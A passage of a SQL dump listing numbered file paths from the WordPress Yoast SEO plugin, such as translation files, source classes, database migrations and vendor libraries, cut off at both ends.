p-content/plugins/wordpress-seo/languages/wordpress-seo-ro_RO.json'),(6138,'wp-content/plugins/wordpress-seo/languages/wordpress-seo-ru_RU.json'),(6139,'wp-content/plugins/wordpress-seo/languages/wordpress-seo-sk_SK.json'),(6140,'wp-content/plugins/wordpress-seo/languages/wordpress-seo-sr_RS.json'),(6141,'wp-content/plugins/wordpress-seo/languages/wordpress-seo-sv_SE.json'),(6142,'wp-content/plugins/wordpress-seo/languages/wordpress-seo-tr_TR.json'),(6143,'wp-content/plugins/wordpress-seo/languages/wordpress-seo-uk.json'),(6144,'wp-content/plugins/wordpress-seo/languages/wordpress-seo-vi.json'),(6145,'wp-content/plugins/wordpress-seo/languages/wordpress-seo-zh_CN.json'),(6146,'wp-content/plugins/wordpress-seo/languages/wordpress-seo-zh_TW.json'),(6147,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-bg_BG.json'),(6148,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-bs_BA.json'),(6149,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-ca.json'),(6150,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-cs_CZ.json'),(6151,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-da_DK.json'),(6152,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-de_DE.json'),(6153,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-el.json'),(6154,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-en_AU.json'),(6155,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-en_CA.json'),(6156,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-en_GB.json'),(6157,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-en_NZ.json'),(6158,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-en_ZA.json'),(6159,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-es_AR.json'),(6160,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-es_CR.json'),(6161,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-es_ES.json'),(6162,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-es_MX.json'),(6163,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-es_PE.json'),(6164,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-es_VE.json'),(6165,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-fa_IR.json'),(6166,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-fr_BE.json'),(6167,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-fr_CA.json'),(6168,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-fr_FR.json'),(6169,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-gl_ES.json'),(6170,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-he_IL.json'),(6171,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-hr.json'),(6172,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-hu_HU.json'),(6173,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-id_ID.json'),(6174,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-it_IT.json'),(6175,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-ja.json'),(6176,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-ko_KR.json'),(6177,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-nb_NO.json'),(6178,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-nl_BE.json'),(6179,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-nl_NL.json'),(6180,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-pl_PL.json'),(6181,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-pt_AO.json'),(6182,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-pt_BR.json'),(6183,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-pt_PT.json'),(6184,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-ro_RO.json'),(6185,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-ru_RU.json'),(6186,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-sk_SK.json'),(6187,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-sr_RS.json'),(6188,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-sv_SE.json'),(6189,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-tr_TR.json'),(6190,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-uk.json'),(6191,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-vi.json'),(6192,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-zh_CN.json'),(6193,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs-zh_TW.json'),(6194,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs.json'),(6195,'wp-content/plugins/wordpress-seo/languages/wordpress-seojs.php'),(6196,'wp-content/plugins/wordpress-seo/languages/yoast-components-bg_BG.json'),(6197,'wp-content/plugins/wordpress-seo/languages/yoast-components-bs_BA.json'),(6198,'wp-content/plugins/wordpress-seo/languages/yoast-components-ca.json'),(6199,'wp-content/plugins/wordpress-seo/languages/yoast-components-cs_CZ.json'),(6200,'wp-content/plugins/wordpress-seo/languages/yoast-components-da_DK.json'),(6201,'wp-content/plugins/wordpress-seo/languages/yoast-components-de_DE.json'),(6202,'wp-content/plugins/wordpress-seo/languages/yoast-components-el.json'),(6203,'wp-content/plugins/wordpress-seo/languages/yoast-components-en_AU.json'),(6204,'wp-content/plugins/wordpress-seo/languages/yoast-components-en_CA.json'),(6205,'wp-content/plugins/wordpress-seo/languages/yoast-components-en_GB.json'),(6206,'wp-content/plugins/wordpress-seo/languages/yoast-components-en_NZ.json'),(6207,'wp-content/plugins/wordpress-seo/languages/yoast-components-en_ZA.json'),(6208,'wp-content/plugins/wordpress-seo/languages/yoast-components-es_AR.json'),(6209,'wp-content/plugins/wordpress-seo/languages/yoast-components-es_CR.json'),(6210,'wp-content/plugins/wordpress-seo/languages/yoast-components-es_ES.json'),(6211,'wp-content/plugins/wordpress-seo/languages/yoast-components-es_MX.json'),(6212,'wp-content/plugins/wordpress-seo/languages/yoast-components-es_PE.json'),(6213,'wp-content/plugins/wordpress-seo/languages/yoast-components-es_VE.json'),(6214,'wp-content/plugins/wordpress-seo/languages/yoast-components-fa_IR.json'),(6215,'wp-content/plugins/wordpress-seo/languages/yoast-components-fr_BE.json'),(6216,'wp-content/plugins/wordpress-seo/languages/yoast-components-fr_CA.json'),(6217,'wp-content/plugins/wordpress-seo/languages/yoast-components-fr_FR.json'),(6218,'wp-content/plugins/wordpress-seo/languages/yoast-components-gl_ES.json'),(6219,'wp-content/plugins/wordpress-seo/languages/yoast-components-he_IL.json'),(6220,'wp-content/plugins/wordpress-seo/languages/yoast-components-hr.json'),(6221,'wp-content/plugins/wordpress-seo/languages/yoast-components-hu_HU.json'),(6222,'wp-content/plugins/wordpress-seo/languages/yoast-components-id_ID.json'),(6223,'wp-content/plugins/wordpress-seo/languages/yoast-components-it_IT.json'),(6224,'wp-content/plugins/wordpress-seo/languages/yoast-components-ja.json'),(6225,'wp-content/plugins/wordpress-seo/languages/yoast-components-ko_KR.json'),(6226,'wp-content/plugins/wordpress-seo/languages/yoast-components-nb_NO.json'),(6227,'wp-content/plugins/wordpress-seo/languages/yoast-components-nl_BE.json'),(6228,'wp-content/plugins/wordpress-seo/languages/yoast-components-nl_NL.json'),(6229,'wp-content/plugins/wordpress-seo/languages/yoast-components-pl_PL.json'),(6230,'wp-content/plugins/wordpress-seo/languages/yoast-components-pt_AO.json'),(6231,'wp-content/plugins/wordpress-seo/languages/yoast-components-pt_BR.json'),(6232,'wp-content/plugins/wordpress-seo/languages/yoast-components-pt_PT.json'),(6233,'wp-content/plugins/wordpress-seo/languages/yoast-components-ro_RO.json'),(6234,'wp-content/plugins/wordpress-seo/languages/yoast-components-ru_RU.json'),(6235,'wp-content/plugins/wordpress-seo/languages/yoast-components-sk_SK.json'),(6236,'wp-content/plugins/wordpress-seo/languages/yoast-components-sr_RS.json'),(6237,'wp-content/plugins/wordpress-seo/languages/yoast-components-sv_SE.json'),(6238,'wp-content/plugins/wordpress-seo/languages/yoast-components-tr_TR.json'),(6239,'wp-content/plugins/wordpress-seo/languages/yoast-components-uk.json'),(6240,'wp-content/plugins/wordpress-seo/languages/yoast-components-vi.json'),(6241,'wp-content/plugins/wordpress-seo/languages/yoast-components-zh_CN.json'),(6242,'wp-content/plugins/wordpress-seo/languages/yoast-components-zh_TW.json'),(6243,'wp-content/plugins/wordpress-seo/languages/yoast-components.php'),(6244,'wp-content/plugins/wordpress-seo/languages/yoast-seo-js.json'),(6245,'wp-content/plugins/wordpress-seo/languages/yoast-seo-js.php'),(6246,'wp-content/plugins/wordpress-seo/lib/model.php'),(6247,'wp-content/plugins/wordpress-seo/lib/orm.php'),(6248,'wp-content/plugins/wordpress-seo/lib/ruckusing-adapter.php'),(6249,'wp-content/plugins/wordpress-seo/lib/ruckusing-framework-runner.php'),(6250,'wp-content/plugins/wordpress-seo/license.txt'),(6251,'wp-content/plugins/wordpress-seo/readme.txt'),(6252,'wp-content/plugins/wordpress-seo/src/actions/indexables/indexable-head-action.php'),(6253,'wp-content/plugins/wordpress-seo/src/actions/indexation/indexable-general-indexation-action.php'),(6254,'wp-content/plugins/wordpress-seo/src/actions/indexation/indexable-post-indexation-action.php'),(6255,'wp-content/plugins/wordpress-seo/src/actions/indexation/indexable-post-type-archive-indexation-action.php'),(6256,'wp-content/plugins/wordpress-seo/src/actions/indexation/indexable-term-indexation-action.php'),(6257,'wp-content/plugins/wordpress-seo/src/actions/indexation/indexation-action-interface.php'),(6258,'wp-content/plugins/wordpress-seo/src/builders/indexable-author-builder.php'),(6259,'wp-content/plugins/wordpress-seo/src/builders/indexable-builder.php'),(6260,'wp-content/plugins/wordpress-seo/src/builders/indexable-date-archive-builder.php'),(6261,'wp-content/plugins/wordpress-seo/src/builders/indexable-hierarchy-builder.php'),(6262,'wp-content/plugins/wordpress-seo/src/builders/indexable-home-page-builder.php'),(6263,'wp-content/plugins/wordpress-seo/src/builders/indexable-post-builder.php'),(6264,'wp-content/plugins/wordpress-seo/src/builders/indexable-post-type-archive-builder.php'),(6265,'wp-content/plugins/wordpress-seo/src/builders/indexable-rebuilder.php'),(6266,'wp-content/plugins/wordpress-seo/src/builders/indexable-social-image-trait.php'),(6267,'wp-content/plugins/wordpress-seo/src/builders/indexable-system-page-builder.php'),(6268,'wp-content/plugins/wordpress-seo/src/builders/indexable-term-builder.php'),(6269,'wp-content/plugins/wordpress-seo/src/builders/primary-term-builder.php'),(6270,'wp-content/plugins/wordpress-seo/src/commands/command-interface.php'),(6271,'wp-content/plugins/wordpress-seo/src/commands/index-command.php'),(6272,'wp-content/plugins/wordpress-seo/src/conditionals/admin-conditional.php'),(6273,'wp-content/plugins/wordpress-seo/src/conditionals/breadcrumbs-enabled-conditional.php'),(6274,'wp-content/plugins/wordpress-seo/src/conditionals/conditional-interface.php'),(6275,'wp-content/plugins/wordpress-seo/src/conditionals/development-conditional.php'),(6276,'wp-content/plugins/wordpress-seo/src/conditionals/feature-flag-conditional.php'),(6277,'wp-content/plugins/wordpress-seo/src/conditionals/front-end-conditional.php'),(6278,'wp-content/plugins/wordpress-seo/src/conditionals/headless-rest-endpoints-enabled-conditional.php'),(6279,'wp-content/plugins/wordpress-seo/src/conditionals/jetpack-conditional.php'),(6280,'wp-content/plugins/wordpress-seo/src/conditionals/migrations-conditional.php'),(6281,'wp-content/plugins/wordpress-seo/src/conditionals/no-conditionals-trait.php'),(6282,'wp-content/plugins/wordpress-seo/src/conditionals/open-graph-conditional.php'),(6283,'wp-content/plugins/wordpress-seo/src/conditionals/primary-category-conditional.php'),(6284,'wp-content/plugins/wordpress-seo/src/conditionals/woocommerce-conditional.php'),(6285,'wp-content/plugins/wordpress-seo/src/conditionals/wpml-conditional.php'),(6286,'wp-content/plugins/wordpress-seo/src/conditionals/yoast-admin-and-dashboard-conditional.php'),(6287,'wp-content/plugins/wordpress-seo/src/config/dependency-management.php'),(6288,'wp-content/plugins/wordpress-seo/src/config/migration-status.php'),(6289,'wp-content/plugins/wordpress-seo/src/config/migrations/20171228151840_WpYoastIndexable.php'),(6290,'wp-content/plugins/wordpress-seo/src/config/migrations/20171228151841_WpYoastPrimaryTerm.php'),(6291,'wp-content/plugins/wordpress-seo/src/config/migrations/20190529075038_WpYoastDropIndexableMetaTableIfExists.php'),(6292,'wp-content/plugins/wordpress-seo/src/config/migrations/20191011111109_WpYoastIndexableHierarchy.php'),(6293,'wp-content/plugins/wordpress-seo/src/config/migrations/20200408101900_AddCollationToTables.php'),(6294,'wp-content/plugins/wordpress-seo/src/config/migrations/20200420073606_AddColumnsToIndexables.php'),(6295,'wp-content/plugins/wordpress-seo/src/config/migrations/20200428123747_BreadcrumbTitleAndHierarchyReset.php'),(6296,'wp-content/plugins/wordpress-seo/src/config/migrations/20200428194858_ExpandIndexableColumnLengths.php'),(6297,'wp-content/plugins/wordpress-seo/src/config/migrations/20200429105310_TruncateIndexableTables.php'),(6298,'wp-content/plugins/wordpress-seo/src/config/migrations/20200430075614_AddIndexableObjectIdAndTypeIndex.php'),(6299,'wp-content/plugins/wordpress-seo/src/config/migrations/20200430150130_ClearIndexableTables.php'),(6300,'wp-content/plugins/wordpress-seo/src/config/migrations/20200507054848_DeleteDuplicateIndexables.php'),(6301,'wp-content/plugins/wordpress-seo/src/config/migrations/20200513133401_ResetIndexableHierarchyTable.php'),(6302,'wp-content/plugins/wordpress-seo/src/config/migrations/ruckusing/lib/Ruckusing/Adapter/why'),(6303,'wp-content/plugins/wordpress-seo/src/config/migrations/ruckusing/lib/Task/why'),(6304,'wp-content/plugins/wordpress-seo/src/config/ruckusing-framework.php'),(6305,'wp-content/plugins/wordpress-seo/src/config/schema-ids.php'),(6306,'wp-content/plugins/wordpress-seo/src/context/meta-tags-context.php'),(6307,'wp-content/plugins/wordpress-seo/src/exceptions/missing-method.php'),(6308,'wp-content/plugins/wordpress-seo/src/functions.php'),(6309,'wp-content/plugins/wordpress-seo/src/generated/container.php'),(6310,'wp-content/plugins/wordpress-seo/src/generators/breadcrumbs-generator.php'),(6311,'wp-content/plugins/wordpress-seo/src/generators/generator-interface.php'),(6312,'wp-content/plugins/wordpress-seo/src/generators/open-graph-image-generator.php'),(6313,'wp-content/plugins/wordpress-seo/src/generators/open-graph-locale-generator.php'),(6314,'wp-content/plugins/wordpress-seo/src/generators/schema/abstract-schema-piece.php'),(6315,'wp-content/plugins/wordpress-seo/src/generators/schema/article.php'),(6316,'wp-content/plugins/wordpress-seo/src/generators/schema/author.php'),(6317,'wp-content/plugins/wordpress-seo/src/generators/schema/breadcrumb.php'),(6318,'wp-content/plugins/wordpress-seo/src/generators/schema/faq.php'),(6319,'wp-content/plugins/wordpress-seo/src/generators/schema/howto.php'),(6320,'wp-content/plugins/wordpress-seo/src/generators/schema/main-image.php'),(6321,'wp-content/plugins/wordpress-seo/src/generators/schema/organization.php'),(6322,'wp-content/plugins/wordpress-seo/src/generators/schema/person.php'),(6323,'wp-content/plugins/wordpress-seo/src/generators/schema/webpage.php'),(6324,'wp-content/plugins/wordpress-seo/src/generators/schema/website.php'),(6325,'wp-content/plugins/wordpress-seo/src/generators/schema-generator.php'),(6326,'wp-content/plugins/wordpress-seo/src/generators/twitter-image-generator.php'),(6327,'wp-content/plugins/wordpress-seo/src/helpers/author-archive-helper.php'),(6328,'wp-content/plugins/wordpress-seo/src/helpers/blocks-helper.php'),(6329,'wp-content/plugins/wordpress-seo/src/helpers/current-page-helper.php'),(6330,'wp-content/plugins/wordpress-seo/src/helpers/date-helper.php'),(6331,'wp-content/plugins/wordpress-seo/src/helpers/home-url-helper.php'),(6332,'wp-content/plugins/wordpress-seo/src/helpers/image-helper.php'),(6333,'wp-content/plugins/wordpress-seo/src/helpers/meta-helper.php'),(6334,'wp-content/plugins/wordpress-seo/src/helpers/open-graph/image-helper.php'),(6335,'wp-content/plugins/wordpress-seo/src/helpers/options-helper.php'),(6336,'wp-content/plugins/wordpress-seo/src/helpers/pagination-helper.php'),(6337,'wp-content/plugins/wordpress-seo/src/helpers/post-helper.php'),(6338,'wp-content/plugins/wordpress-seo/src/helpers/post-type-helper.php'),(6339,'wp-content/plugins/wordpress-seo/src/helpers/primary-term-helper.php'),(6340,'wp-content/plugins/wordpress-seo/src/helpers/product-helper.php'),(6341,'wp-content/plugins/wordpress-seo/src/helpers/redirect-helper.php'),(6342,'wp-content/plugins/wordpress-seo/src/helpers/robots-helper.php'),(6343,'wp-content/plugins/wordpress-seo/src/helpers/schema/article-helper.php'),(6344,'wp-content/plugins/wordpress-seo/src/helpers/schema/html-helper.php'),(6345,'wp-content/plugins/wordpress-seo/src/helpers/schema/id-helper.php'),(6346,'wp-content/plugins/wordpress-seo/src/helpers/schema/image-helper.php'),(6347,'wp-content/plugins/wordpress-seo/src/helpers/schema/language-helper.php'),(6348,'wp-content/plugins/wordpress-seo/src/helpers/site-helper.php'),(6349,'wp-content/plugins/wordpress-seo/src/helpers/string-helper.php'),(6350,'wp-content/plugins/wordpress-seo/src/helpers/taxonomy-helper.php'),(6351,'wp-content/plugins/wordpress-seo/src/helpers/twitter/image-helper.php'),(6352,'wp-content/plugins/wordpress-seo/src/helpers/url-helper.php'),(6353,'wp-content/plugins/wordpress-seo/src/helpers/user-helper.php'),(6354,'wp-content/plugins/wordpress-seo/src/initializers/initializer-interface.php'),(6355,'wp-content/plugins/wordpress-seo/src/initializers/migration-runner.php'),(6356,'wp-content/plugins/wordpress-seo/src/integrations/admin/indexation-integration.php'),(6357,'wp-content/plugins/wordpress-seo/src/integrations/admin/migration-error-integration.php'),(6358,'wp-content/plugins/wordpress-seo/src/integrations/breadcrumbs-integration.php'),(6359,'wp-content/plugins/wordpress-seo/src/integrations/front-end/backwards-compatibility.php'),(6360,'wp-content/plugins/wordpress-seo/src/integrations/front-end/category-term-description.php'),(6361,'wp-content/plugins/wordpress-seo/src/integrations/front-end/comment-link-fixer.php'),(6362,'wp-content/plugins/wordpress-seo/src/integrations/front-end/force-rewrite-title.php'),(6363,'wp-content/plugins/wordpress-seo/src/integrations/front-end/handle-404.php'),(6364,'wp-content/plugins/wordpress-seo/src/integrations/front-end/indexing-controls.php'),(6365,'wp-content/plugins/wordpress-seo/src/integrations/front-end/open-graph-oembed.php'),(6366,'wp-content/plugins/wordpress-seo/src/integrations/front-end/redirects.php'),(6367,'wp-content/plugins/wordpress-seo/src/integrations/front-end/rss-footer-embed.php'),(6368,'wp-content/plugins/wordpress-seo/src/integrations/front-end/theme-titles.php'),(6369,'wp-content/plugins/wordpress-seo/src/integrations/front-end-integration.php'),(6370,'wp-content/plugins/wordpress-seo/src/integrations/integration-interface.php'),(6371,'wp-content/plugins/wordpress-seo/src/integrations/primary-category.php'),(6372,'wp-content/plugins/wordpress-seo/src/integrations/third-party/amp.php'),(6373,'wp-content/plugins/wordpress-seo/src/integrations/third-party/bbpress.php'),(6374,'wp-content/plugins/wordpress-seo/src/integrations/third-party/jetpack.php'),(6375,'wp-content/plugins/wordpress-seo/src/integrations/third-party/woocommerce.php'),(6376,'wp-content/plugins/wordpress-seo/src/integrations/third-party/wpml.php'),(6377,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-author-watcher.php'),(6378,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-date-archive-watcher.php'),(6379,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-home-page-watcher.php'),(6380,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-permalink-watcher.php'),(6381,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-meta-watcher.php'),(6382,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-type-archive-watcher.php'),(6383,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-watcher.php'),(6384,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-static-home-page-watcher.php'),(6385,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-system-page-watcher.php'),(6386,'wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-term-watcher.php'),(6387,'wp-content/plugins/wordpress-seo/src/integrations/watchers/option-titles-watcher.php'),(6388,'wp-content/plugins/wordpress-seo/src/integrations/watchers/primary-term-watcher.php'),(6389,'wp-content/plugins/wordpress-seo/src/loadable-interface.php'),(6390,'wp-content/plugins/wordpress-seo/src/loader.php'),(6391,'wp-content/plugins/wordpress-seo/src/loaders/oauth.php'),(6392,'wp-content/plugins/wordpress-seo/src/loggers/database-logger.php'),(6393,'wp-content/plugins/wordpress-seo/src/loggers/logger.php'),(6394,'wp-content/plugins/wordpress-seo/src/loggers/migration-logger.php'),(6395,'wp-content/plugins/wordpress-seo/src/main.php'),(6396,'wp-content/plugins/wordpress-seo/src/memoizers/meta-tags-context-memoizer.php'),(6397,'wp-content/plugins/wordpress-seo/src/memoizers/presentation-memoizer.php'),(6398,'wp-content/plugins/wordpress-seo/src/models/indexable-extension.php'),(6399,'wp-content/plugins/wordpress-seo/src/models/indexable-hierarchy.php'),(6400,'wp-content/plugins/wordpress-seo/src/models/indexable.php'),(6401,'wp-content/plugins/wordpress-seo/src/models/primary-term.php'),(6402,'wp-content/plugins/wordpress-seo/src/models/seo-links.php'),(6403,'wp-content/plugins/wordpress-seo/src/models/seo-meta.php'),(6404,'wp-content/plugins/wordpress-seo/src/oauth/client.php'),(6405,'wp-content/plugins/wordpress-seo/src/presentations/abstract-presentation.php'),(6406,'wp-content/plugins/wordpress-seo/src/presentations/archive-adjacent-trait.php'),(6407,'wp-content/plugins/wordpress-seo/src/presentations/indexable-author-archive-presentation.php'),(6408,'wp-content/plugins/wordpress-seo/src/presentations/indexable-date-archive-presentation.php'),(6409,'wp-content/plugins/wordpress-seo/src/presentations/indexable-error-page-presentation.php'),(6410,'wp-content/plugins/wordpress-seo/src/presentations/indexable-home-page-presentation.php'),(6411,'wp-content/plugins/wordpress-seo/src/presentations/indexable-post-type-archive-presentation.php'),(6412,'wp-content/plugins/wordpress-seo/src/presentations/indexable-post-type-presentation.php'),(6413,'wp-content/plugins/wordpress-seo/src/presentations/indexable-presentation.php'),(6414,'wp-content/plugins/wordpress-seo/src/presentations/indexable-search-result-page-presentation.php'),(6415,'wp-content/plugins/wordpress-seo/src/presentations/indexable-static-home-page-presentation.php'),(6416,'wp-content/plugins/wordpress-seo/src/presentations/indexable-static-posts-page-presentation.php'),(6417,'wp-content/plugins/wordpress-seo/src/presentations/indexable-term-archive-presentation.php'),(6418,'wp-content/plugins/wordpress-seo/src/presenters/abstract-indexable-presenter.php'),(6419,'wp-content/plugins/wordpress-seo/src/presenters/abstract-indexable-tag-presenter.php'),(6420,'wp-content/plugins/wordpress-seo/src/presenters/abstract-presenter.php'),(6421,'wp-content/plugins/wordpress-seo/src/presenters/admin/alert-presenter.php'),(6422,'wp-content/plugins/wordpress-seo/src/presenters/admin/indexation-list-item-presenter.php'),(6423,'wp-content/plugins/wordpress-seo/src/presenters/admin/indexation-modal-presenter.php'),(6424,'wp-content/plugins/wordpress-seo/src/presenters/admin/indexation-warning-presenter.php'),(6425,'wp-content/plugins/wordpress-seo/src/presenters/admin/migration-error-presenter.php'),(6426,'wp-content/plugins/wordpress-seo/src/presenters/bingbot-presenter.php'),(6427,'wp-content/plugins/wordpress-seo/src/presenters/breadcrumbs-presenter.php'),(6428,'wp-content/plugins/wordpress-seo/src/presenters/canonical-presenter.php'),(6429,'wp-content/plugins/wordpress-seo/src/presenters/debug/marker-close-presenter.php'),(6430,'wp-content/plugins/wordpress-seo/src/presenters/debug/marker-open-presenter.php'),(6431,'wp-content/plugins/wordpress-seo/src/presenters/googlebot-presenter.php'),(6432,'wp-content/plugins/wordpress-seo/src/presenters/meta-description-presenter.php'),(6433,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-author-presenter.php'),(6434,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-modified-time-presenter.php'),(6435,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-published-time-presenter.php'),(6436,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-publisher-presenter.php'),(6437,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/description-presenter.php'),(6438,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/fb-app-id-presenter.php'),(6439,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/image-presenter.php'),(6440,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/locale-presenter.php'),(6441,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/site-name-presenter.php'),(6442,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/title-presenter.php'),(6443,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/type-presenter.php'),(6444,'wp-content/plugins/wordpress-seo/src/presenters/open-graph/url-presenter.php'),(6445,'wp-content/plugins/wordpress-seo/src/presenters/rel-next-presenter.php'),(6446,'wp-content/plugins/wordpress-seo/src/presenters/rel-prev-presenter.php'),(6447,'wp-content/plugins/wordpress-seo/src/presenters/robots-presenter.php'),(6448,'wp-content/plugins/wordpress-seo/src/presenters/schema-presenter.php'),(6449,'wp-content/plugins/wordpress-seo/src/presenters/title-presenter.php'),(6450,'wp-content/plugins/wordpress-seo/src/presenters/twitter/card-presenter.php'),(6451,'wp-content/plugins/wordpress-seo/src/presenters/twitter/creator-presenter.php'),(6452,'wp-content/plugins/wordpress-seo/src/presenters/twitter/description-presenter.php'),(6453,'wp-content/plugins/wordpress-seo/src/presenters/twitter/image-presenter.php'),(6454,'wp-content/plugins/wordpress-seo/src/presenters/twitter/site-presenter.php'),(6455,'wp-content/plugins/wordpress-seo/src/presenters/twitter/title-presenter.php'),(6456,'wp-content/plugins/wordpress-seo/src/presenters/webmaster/baidu-presenter.php'),(6457,'wp-content/plugins/wordpress-seo/src/presenters/webmaster/bing-presenter.php'),(6458,'wp-content/plugins/wordpress-seo/src/presenters/webmaster/google-presenter.php'),(6459,'wp-content/plugins/wordpress-seo/src/presenters/webmaster/pinterest-presenter.php'),(6460,'wp-content/plugins/wordpress-seo/src/presenters/webmaster/yandex-presenter.php'),(6461,'wp-content/plugins/wordpress-seo/src/repositories/indexable-hierarchy-repository.php'),(6462,'wp-content/plugins/wordpress-seo/src/repositories/indexable-repository.php'),(6463,'wp-content/plugins/wordpress-seo/src/repositories/primary-term-repository.php'),(6464,'wp-content/plugins/wordpress-seo/src/repositories/seo-links-repository.php'),(6465,'wp-content/plugins/wordpress-seo/src/repositories/seo-meta-repository.php'),(6466,'wp-content/plugins/wordpress-seo/src/routes/abstract-indexation-route.php'),(6467,'wp-content/plugins/wordpress-seo/src/routes/indexable-indexation-route.php'),(6468,'wp-content/plugins/wordpress-seo/src/routes/indexables-head-route.php'),(6469,'wp-content/plugins/wordpress-seo/src/routes/route-interface.php'),(6470,'wp-content/plugins/wordpress-seo/src/routes/yoast-head-rest-field.php'),(6471,'wp-content/plugins/wordpress-seo/src/surfaces/classes-surface.php'),(6472,'wp-content/plugins/wordpress-seo/src/surfaces/helpers-surface.php'),(6473,'wp-content/plugins/wordpress-seo/src/surfaces/meta-surface.php'),(6474,'wp-content/plugins/wordpress-seo/src/surfaces/open-graph-helpers-surface.php'),(6475,'wp-content/plugins/wordpress-seo/src/surfaces/schema-helpers-surface.php'),(6476,'wp-content/plugins/wordpress-seo/src/surfaces/twitter-helpers-surface.php'),(6477,'wp-content/plugins/wordpress-seo/src/surfaces/values/meta.php'),(6478,'wp-content/plugins/wordpress-seo/src/values/images.php'),(6479,'wp-content/plugins/wordpress-seo/src/values/open-graph/images.php'),(6480,'wp-content/plugins/wordpress-seo/src/wordpress/wrapper.php'),(6481,'wp-content/plugins/wordpress-seo/src/wrappers/wp-query-wrapper.php'),(6482,'wp-content/plugins/wordpress-seo/src/wrappers/wp-rewrite-wrapper.php'),(6483,'wp-content/plugins/wordpress-seo/vendor/autoload.php'),(6484,'wp-content/plugins/wordpress-seo/vendor/composer/ClassLoader.php'),(6485,'wp-content/plugins/wordpress-seo/vendor/composer/LICENSE'),(6486,'wp-content/plugins/wordpress-seo/vendor/composer/autoload_classmap.php'),(6487,'wp-content/plugins/wordpress-seo/vendor/composer/autoload_namespaces.php'),(6488,'wp-content/plugins/wordpress-seo/vendor/composer/autoload_psr4.php'),(6489,'wp-content/plugins/wordpress-seo/vendor/composer/autoload_real.php'),(6490,'wp-content/plugins/wordpress-seo/vendor/composer/autoload_static.php'),(6491,'wp-content/plugins/wordpress-seo/vendor/yoast/i18n-module/CHANGELOG.md'),(6492,'wp-content/plugins/wordpress-seo/vendor/yoast/i18n-module/src/i18n-v3.php'),(6493,'wp-content/plugins/wordpress-seo/vendor/yoast/i18n-module/src/i18n-wordpressorg-v3.php'),(6494,'wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/CHANGELOG.md'),(6495,'wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/class-api-request.php'),(6496,'wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/class-license-manager.php'),(6497,'wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/class-plugin-license-manager.php'),(6498,'wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/class-plugin-update-manager.php'),(6499,'wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/class-product.php'),(6500,'wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/class-update-manager.php'),(6501,'wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/index.php'),(6502,'wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/views/form.php'),(6503,'wp-content/plugins/wordpress-seo/ve